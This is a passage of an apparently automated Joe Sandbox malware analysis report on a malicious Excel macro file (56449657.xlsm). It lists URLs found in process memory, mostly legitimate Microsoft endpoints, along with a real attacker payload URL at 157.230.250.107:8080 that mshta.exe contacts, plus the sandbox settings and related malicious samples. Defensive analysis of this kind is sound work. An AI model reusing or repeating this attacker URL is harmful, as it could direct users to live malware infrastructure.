                                                                        https://outlook.office.com(EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        low
                                                                        https://wus2.contentsync.EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://clients.config.office.net/user/v1.0/ios7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                          high
                                                                          https://login.windows.net/common/oauth2/authorizeXKAEXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://o365auditrealtimeingestion.manage.office.comEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                              high
                                                                              https://outlook.office365.com/api/v1.0/me/Activities7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                high
                                                                                https://login.windows.net/common/oauth2/authorizePEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://clients.config.office.net/user/v1.0/android/policies7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                    high
                                                                                    https://api.diagnosticssdf.office.comUEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://analysis.windows.net/powerbi/apiTEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://entitlement.diagnostics.office.com7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                        high
                                                                                        https://login.windows.net/common/oauth2/authorizenREXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://login.windows.net/common/oauth2/authorizeCS0EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                              high
                                                                                              https://dataservice.o365filterEXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://outlook.office.com/EXCEL.EXE, 00000000.00000002.933997365.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782673322.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662745522.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787123980.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743580229.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807929408.000000001328A000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                high
                                                                                                https://storage.live.com/clientlogs/uploadlocationEXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                  high
                                                                                                  http://157.230.250.107:8080/mfkrmothRmshta.exe, 00000011.00000002.928213340.00000269D5515000.00000004.00000020.sdmp, mshta.exe, 00000011.00000003.857806201.00000269D5515000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://login.windows.net/common/oauth2/authorizeBEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://dataservice.protection.outlEXCEL.EXE, 00000000.00000002.933748369.0000000013149000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://substrate.office.com/search/api/v1/SearchHistoryEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                      high
                                                                                                      https://login.windows.net/common/oauth2/authorize?EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://analysis.windows.net/powerbi/api1EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://graph.windows.net/7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                            high
                                                                                                            https://devnull.onenote.comEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                              high
                                                                                                              https://login.windows.net/common/oauth2/authorizeO6EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://157.230.250.107:8080/mfkrmothermshta.exe, 00000011.00000002.928213340.00000269D5515000.00000004.00000020.sdmp, mshta.exe, 00000011.00000003.857806201.00000269D5515000.00000004.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://login.windows.net/common/oauth2/authorize(EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://messaging.office.com/EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                                    high
                                                                                                                    http://157.230.250.107:8080/mfkrmotherfuckemshta.exe, 00000011.00000002.928213340.00000269D5515000.00000004.00000020.sdmp, mshta.exe, 00000011.00000003.857806201.00000269D5515000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://cortana.aiZEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://outlook.office365.com/autodiscover/autodiscover.jsonaBEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                                        high
                                                                                                                        https://skyapi.live.net/Activity/EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://login.windows-ppe.net/common/oauth2/authorizesREXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://157.230.250.107:8mshta.exe, 00000011.00000003.857834199.00000269D553C000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.928246833.00000269D553C000.00000004.00000020.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://157.230.250.10emshta.exe, 00000011.00000003.857834199.00000269D553C000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.928246833.00000269D553C000.00000004.00000020.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          low
                                                                                                                          https://api.cortana.ai7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://dataservice.o365filtering.compDyEXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://visio.uservoice.com/forums/368202-visio-on-devicesEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                                            high
                                                                                                                            https://staging.cortana.ai7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://onedrive.live.com/embed?7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                                              high
                                                                                                                              https://augloop.office.comEXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                                                high
                                                                                                                                https://login.windows.net/common/oauth2/authorize018EXCEL.EXE, 00000000.00000003.801049819.000000000F88C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787311248.000000000F88C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.932505798.000000000F88C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742840890.000000000F88C000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://157.230.250.107:8080/mfkrmotherfuckeru6y82saSMmshta.exe, 00000011.00000003.857823332.00000269D552F000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.928232600.00000269D552F000.00000004.00000020.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://login.windows.net/common/oauth2/authorizelREXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://login.windows.net/common/oauth2/authorizeficEXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpfalse
                                                                                                                                      high

                                                                                                                                      Contacted IPs

                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs

                                                                                                                                      Public

                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      157.230.250.107
                                                                                                                                      unknownUnited States
                                                                                                                                      14061DIGITALOCEAN-ASNUSfalse

                                                                                                                                      General Information

                                                                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                      Analysis ID:532311
                                                                                                                                      Start date:02.12.2021
                                                                                                                                      Start time:00:42:22
                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 6m 17s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:full
                                                                                                                                      Sample file name:56449657.xlsm
                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                      Number of analysed new started processes analysed:19
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • HDC enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal100.troj.expl.evad.winXLSM@7/8@0/1
                                                                                                                                      EGA Information:Failed
                                                                                                                                      HDC Information:Failed
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                      • Number of executed functions: 0
                                                                                                                                      • Number of non-executed functions: 3
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Adjust boot time
                                                                                                                                      • Enable AMSI
                                                                                                                                      • Found application associated with file extension: .xlsm
                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                      • Attach to Office via COM
                                                                                                                                      • Scroll down
                                                                                                                                      • Close Viewer
                                                                                                                                      Warnings:
                                                                                                                                      Show All
                                                                                                                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                      • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.32.63, 52.109.8.23, 52.109.8.24
                                                                                                                                      • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                      Simulations

                                                                                                                                      Behavior and APIs

                                                                                                                                      TimeTypeDescription
                                                                                                                                      00:44:46API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                      00:44:48API Interceptor2x Sleep call for process: mshta.exe modified

                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                      IPs

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                      157.230.250.1073762.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                      56449657.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                      08676789691.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                      3762.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                      55339.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                      08676789691.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                      55339.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                      SecuriteInfo.com.Heur.8342.xlsGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                      SecuriteInfo.com.Heur.17052.xlsGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                      SecuriteInfo.com.Heur.8342.xlsGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                      57949616735.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                      57949616735.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                      44307.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                      44307.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                      77859564213.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                      77859564213.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                      1762311.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                      1762311.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                      88985.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                      88985.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e

                                                                                                                                      Domains

                                                                                                                                      No context

                                                                                                                                      ASN

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                      DIGITALOCEAN-ASNUS3762.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107
                                                                                                                                      56449657.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107
                                                                                                                                      08676789691.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107
                                                                                                                                      3762.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107
                                                                                                                                      55339.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107
                                                                                                                                      08676789691.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107
                                                                                                                                      55339.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107
                                                                                                                                      SecuriteInfo.com.Heur.8342.xlsGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107
                                                                                                                                      SecuriteInfo.com.Heur.17052.xlsGet hashmaliciousBrowse
                                                                                                                                      • 157.230.250.107
